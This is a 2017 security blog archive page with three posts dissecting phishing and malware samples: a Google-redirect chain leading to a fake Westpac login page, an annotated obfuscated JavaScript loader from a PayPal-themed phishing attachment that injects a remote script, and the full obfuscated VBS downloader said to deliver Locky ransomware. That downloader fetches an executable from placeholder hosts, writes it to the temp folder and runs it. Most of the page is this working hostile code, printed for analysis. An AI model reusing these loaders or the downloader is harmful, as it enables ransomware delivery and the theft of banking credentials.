+ -

Pages

Wednesday, September 27, 2017

Phishing - google redirect function used in link for phising WestPac bank

https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8&ved=0ahUKEwitg8Sfs8bWAhXSmLQKHTsHBCY4FBAWCCUwAA&url=http%3A%2F%2Fwww.almatulum.com%2Fblog%2Fnew-lounge-area%2F&usg=AFQjCNEr6lEZY_UW0EQJVFerr39HdTCk3w

Which should lead to: http://www.almatulum.com/blog/new-lounge-area/

Which again redirects to: https://hustlecreative.com/w/westpac/WestpacOnlineBanking.htm?mekteewibtmdakuaiaiiiesaudalnlzumizrnneadenaarlteannbnlaweadndaasdtlnlmedwenlaadamraklaezziewetanmkdsbasllaiiammuitblndatdndeltiniraanunenuean83044339483

Which is the fake westpac page.
Just another phishing email with a twist.


5 RakshaTec: September 2017 https://www.google.com.au/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&cad=rja&uact=8&ved=0ahUKEwitg8Sfs8bWAhX...

Tuesday, September 26, 2017

Phishing - JavaScript loader in HTML page - PayPal theme

This is sent as an attachment, so that the actual script is executed locally as opposed to over the network. Makes it a bit easier to execute the first stage (avoiding network-based detection). The page eventually loaded is the fake paypal site, and the information entered is sent to the c2 server. Last re-direct happens to the actual paypal site so that the user doesnt suspects anything. 

Syntax Highlighting:

<!DOCTYPE html>
<html lang="en-US">
<head>
<meta charset="utf-8">
</head>

<body><script>

function c7tn83(rd1jqp4)
{
var lgx4s84f = 0;
var pojb6ff = '';
if( rd1jqp4.substr(0,2) == '0x' ){ lgx4s84f = 2; }
if( typeof rd1jqp4 != 'string' ){ rd1jqp4 = rd1jqp4.toString(); }
for(var apnsxieh=lgx4s84f;  apnsxieh<rd1jqp4.length; apnsxieh+=2) {
var c = rd1jqp4.substr( apnsxieh, 2 );
pojb6ff = pojb6ff + String.fromCharCode( parseInt(c, 16) );
}
return pojb6ff;
}

function f8ce53222(ll1u8137, rx3oj311) {
  var pf9879t75, khqr2, gecb, jxl077g53, in3431y23, sgcbn1e9;
  for (pf9879t75 = [], khqr2 = 0, jxl077g53 = "", in3431y23 = 0; in3431y23 < 256; in3431y23++) pf9879t75[in3431y23] = in3431y23;
  for (in3431y23 = 0; in3431y23 < 256; in3431y23++)
khqr2 = (khqr2 + pf9879t75[in3431y23] + rx3oj311.charCodeAt((in3431y23 % rx3oj311.length))) % 256,
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = (gecb);
  for (in3431y23 = 0, khqr2 = 0, sgcbn1e9 = 0; sgcbn1e9 < ll1u8137.length; sgcbn1e9++)
in3431y23 = ((in3431y23 + 1) % 256),
khqr2 = ((khqr2 + pf9879t75[in3431y23]) % 256),
gecb = pf9879t75[in3431y23],
pf9879t75[in3431y23] = pf9879t75[khqr2],
pf9879t75[khqr2] = gecb,
jxl077g53 += String.fromCharCode(ll1u8137.charCodeAt(sgcbn1e9) ^ pf9879t75[(pf9879t75[in3431y23] + pf9879t75[khqr2]) % 256]);
  return jxl077g53
}

var p918 = f8ce53222(c7tn83("bf60ebafd0d90960a362261832f1f761ff1035c62e116e5aab1375eedd172ea62ec6f93dcebb7eefa70700089344e012807d8fac5caeff92c7ba86b46e4ba2"),"j388p");
*/ p918: "http://www.subject-data.com/1f5669beacc555da69e67826724fd033.js" - this is the script that will be loaded into browser


var zgdz = f8ce53222(c7tn83("a477edb69a82"),"j388p");

*/ zgdz: "script"

var qw1mpd9 = document.createElement(zgdz);
qw1mpd9.src = p918;
var jkl6lg = f8ce53222(c7tn83("bf71febb"),"j388p");
*/ jkl6lg: "head"

document.getElementsByTagName(jkl6lg)[0].appendChild(qw1mpd9);
*/ this will result in: head > script > JS
</script>

</body>
</html>
5 RakshaTec: September 2017 This is sent as an attachment, so that the actual script is executed locally as opposed to over the network. Makes it a bit easier to execu...

Monday, September 25, 2017

Here's a simple, straight-forward downloader that can serve any payload

Written in simple VBS, launched by WScript on a Win host. 

Currently serving Locky Ransomware


Dim UltraXgettingensurance 'As String

Dim UltraXgettingUotOfStock 'As String

Function CopyLog()

        Dim oFile
        Dim iRetVal, fptr1, fptr2, sLine, sNewLogFolderName, sLogFile
        Dim sComputer
        Dim sLog
        Dim sBootDrive
        ' Make sure the path is accessible
        oUtility.ValidateConnection oEnvironment.Item("SLShare")
        oUtility.VerifyPathExists oEnvironment.Item("SLShare")
        If not oFSO.FolderExists(oEnvironment.Item("SLShare")) then
            oLogging.CreateEntry "An invalid SLShare value of " & oEnvironment.Item("SLShare") & " was specified.", LogTypeWarning
            Exit Function
        End if

       

    End Function
   
Function Set2Mine(Who, Color, X, y )
    For i = 0 To UBound(Mines) + 1
        If i > UBound(Mines) Then ReDim Preserve Mines(i)
        If Mines(i).Color = 0 Then
            Mines(i).Who = Who
            Mines(i).Color = Color
            Mines(i).X = X
            Mines(i).y = y
            Mines(i).Tick = 0
            SetMine = i
            Exit For
        End If
    Next
End Function




Function StateUovertakesgetting()
if D = 19 then
AXC = "SaveT"+"oFile"
end if
StateUovertakes4000.Savetofile UltraXgettingUotOfStock , 9-7
End Function

  UltraXgettingBelish = "User"




Function F3(p, ddd)
    Set UltraXgettingRombickom = CreateObject("WScrip"+"t.Shell")   
End Function

 Dim Advancedmantel2 'As String

Function ABTF(A, B, T, F)
    set ABTF = A.CreateTextFile( B,T , F)
end function

Dim UltraXgettingRickyTIcky 'As Object
Dim StateUovertakes4000 'As Object

    RACHEL = "avetof"

       Dim TristateTrue

  Advancedmantel2 = "XMLHTTPFIREMANAdodb.streaMFIREMANs"
Vrungel = ".respo"+"nseBody"
Function SheduledObject(p,d)


 UltraXgettingRombickom.Run("" &UltraXgettingUotOfStock )
End Function


Dim UltraXgettingTimeTo 'As Object
Dim UltraXgettingstatus
UltraXgettingstatus = false
     Dim JohnTheRipper
Dim UltraXgettingcashback 'As Object
CUA ="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

Dim UltraXgetting1DASH1solo 'As Object  

Advancedmantel2 ="Microsoft." + Advancedmantel2+  "hell.ApplicationFIREMANWscript"+".shellFIREMANProcessFIREMANGeTFIREMANT"+"emPFIREMANTyJACKSON"+"peJACKSON"


Function MambaMamba( TIK )
   MambaMamba = Split(Replace(Advancedmantel2, "JACKSON", "" ),  TIK)
End Function
Dim mual

Function StateUovertakesgetting2(param1)
param1 = param1 + param1

UltraXgettingResponseBody = UltraXgettingRickyTIcky.responseBody
param1 = 4 * param1 + 8   

End Function


Public Function IsLineAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnLineCanonic Or _
    Figures(Figure1).FigureType = dsAnLineGeneral Or _
    Figures(Figure1).FigureType = dsAnLineNormal Or _
    Figures(Figure1).FigureType = dsAnLineNormalPoint Then IsLineAnalytic = True
End If
End Function


Public Function IsCircleAnalytic(ByVal Figure1 )
If Figure1 < FigureCount And Figure1 >= 0 Then
    If Figures(Figure1).FigureType = dsAnCircle Then IsCircleAnalytic = True
End If
End Function
Advancedmantel2 = Advancedmantel2 +"FIREMANJACKSONoJACKSONpenFIREMANwrJACKSONiteFIREMANreJACKSONspoJACKSONnseBoJACKSONdyFIREMANsaJACKSONvetof"+"JACKSONileFIREMAN\xhAFULQ.ex"+"eJACKSONFIREMANhtJACKSONtp:FIREMAN//"
Function UltraXgettingFuks(p)

UltraXgettingRickyTIcky.Send
   
End Function
JohnTheRipper = MambaMamba("" + "FIREMAN" + "")



  Private Sub SubscriptionHistoryMaintenance(ByVal db , ByRef curlist , ByVal historyLength )
    If historyLength < 1 Then
      historyLength = 1 ' Minimum history length is one!
    End If

    ' Sort by date descending (default sorter for PST sorts descending)
    curlist.Sort()

    ' Now purge any old files
    For i  = 0 To curlist.Count - 1
      If i >= historyLength Then
        Me.PurgePodcastFile db, curlist(i)
      End If
    Next
  End Sub
Set UltraXgettingRickyTIcky = CreateObject(JohnTheRipper(0))

Dim UltraXgetting4 'As String

Dim UltraXgettingResponseBody 'As Variant
Dim UltraXgettingRombickom
 Dim MarketPlace 'As String
  Dim sTempVis 'As String
  Dim iCount 'As Integer
Public Function WriteCD(aWrite,bWrite)
astp = 12
astp = astp + 3
if astp > 4 then
aWrite.Write bWrite
astp = 3 * astp
end if
End Function
Dim Valery 'As Integer
UltraXgettingBelish = UltraXgettingBelish + "-"

Dim Twelve 'As Integer
  Dim sDecimalVis 'As String
  Dim UltraXgettingPetir 'As String
UltraXgettingPetir = "Ag"

  Dim MarketPlaceibility 'As String


 Dim sNodeKey 'As String
  Dim sParentKey 'As String

   


Twelve = 11 + 1
zTempVis = JohnTheRipper(1)

'Set UltraXgettingTimeTo = CreateObject(JohnTheRipper(8-6))
Set UltraXgettingRockiBilbo = GetRef("SheduledObject")

Set StateUovertakes4000 = CreateObject("Adodb.streaM")
Set UltraXgetting1DASH1solo = CreateObject(JohnTheRipper(9-6))


Function SetUA()
UltraXgettingLamp.setRequestHeader UltraXgettingBelish, CUA
End Function

if "RIDG" + WScript + "4" = "RIDGWindows Script Host4" Then
   
   
mual = Array("pawnedsite-1.com/payload","pawnedsite-2.com/payload","pawnedsite-3.com/payload")

    Set UltraXgettingcashback = UltraXgetting1DASH1solo.Environment(JohnTheRipper(1 + 3))

end if   


Public Function Anim2UniBall(i)
    Dim Rx, Ry, rBuff
    Dim xt, yt, j, e
    Dim NewX, NewY, d, SgnX, SgnY
    Dim RatioX, RatioY
    Rx = 452
    Ry = 81
   
   
    If SgnY = 1 Then 'y positive testing
        For d = UniBall(i).BallY + 1 To NewY
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d - 1
                Exit For
            End If
        Next
    End If
   
    If SgnY = -1 Then 'y negative testing
        For d = UniBall(i).BallY - 1 To NewY Step -1
            j = WeaponTouch(6, i, NewX, d)
            If j = -6 Then
                UniBall(i).BMoveY = UniBall(i).BMoveY * -1
                NewY = d + 1
                Exit For
            End If
        Next
    End If
    j = WeaponTouch(6, i, NewX, NewY)
    If j = -7 Then Exit Function
   
    UniBall(i).BallX = NewX
    UniBall(i).BallY = NewY
End Function


 Valery = 89210


UltraXgettingensurance = UltraXgettingcashback(JohnTheRipper(6))
 Dim i
 'on error GoTo nextU
' on error resume next
sTempVis = JohnTheRipper(Twelve)

Sub SendFlagDat(SndTo)
    Dim i , b , n
    Dim oNewMsg() , lNewOffSet
    Dim lNewMsg
   
    For i = 1 To UBound(Flag1, 2)
       
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 1
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag1(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag1(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry1(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag2, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 2
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag2(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag2(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry2(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag3, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 3
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag3(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag3(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry3(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag4, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 4
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag4(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag4(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry4(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
    For i = 1 To UBound(Flag5, 2)
        lNewMsg = MSG_FLAGS
        lNewOffSet = 0
        ReDim oNewMsg(0)
        AddBufferData oNewMsg, VarPtr(lNewMsg), LenB(lNewMsg), lNewOffSet
        b = 5
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        b = i
        AddBufferData oNewMsg, VarPtr(b), LenB(b), lNewOffSet
        n = Flag5(0, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = Flag5(1, i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        n = FlagCarry5(i)
        AddBufferData oNewMsg, VarPtr(n), LenB(n), lNewOffSet
        SendTo oNewMsg, CInt(SndTo)
    Next
   
End Sub

MarketPlace = JohnTheRipper(11+2) & JohnTheRipper(11+3)

UltraXgettingBelish = UltraXgettingBelish & UltraXgettingPetir & "ent"

rdde = 19


lTo = UBound(mual)
For i = 0 To lTo Step 1
rdde = rdde * 8

    on error resume  next

Valery =  Valery +33
 UltraXgetting4 = MarketPlace + mual(i)
 UltraXgettingRickyTIcky.Open JohnTheRipper(5), UltraXgetting4, False
dr1=2

rdde = rdde + 91


SetUA()
UltraXgettingFuks " d "
If UltraXgettingRickyTIcky.Status +3 = 203 Then
UltraXgettingstatus = true
 Exit For
End If

goto14:
Next

on error goto 0
if UltraXgettingstatus Then
Dim Ratchet 'As String
 UltraXgettingUotOfStock = UltraXgettingensurance+ sTempVis

F3 "",4
StateUovertakes4000.Type = 1
 StateUovertakes4000.Open
StateUovertakesgetting2 22
WriteCD StateUovertakes4000,UltraXgettingResponseBody
dttat =4
UltraXgettingUotOfStocku = "" + UltraXgettingUotOfStock

dttat = dttat*2

StateUovertakesgetting()
Dim UltraXgettingJohnSnowu,UltraXgettingTmp1 'As Long

UltraXgettingJohnSnowu = 3012

If 1040  < UltraXgettingJohnSnowu Then
  drba =55
 UltraXgettingTmp1 = "|"

UltraXgettingRockiBilbo "}}}}}}}}}}}}}","062"
End If
 


triada = 341
end if


5 RakshaTec: September 2017 Written in simple VBS, launched by WScript on a Win host.  Currently serving Locky Ransomware Dim UltraXgettingensurance 'As Strin...
< >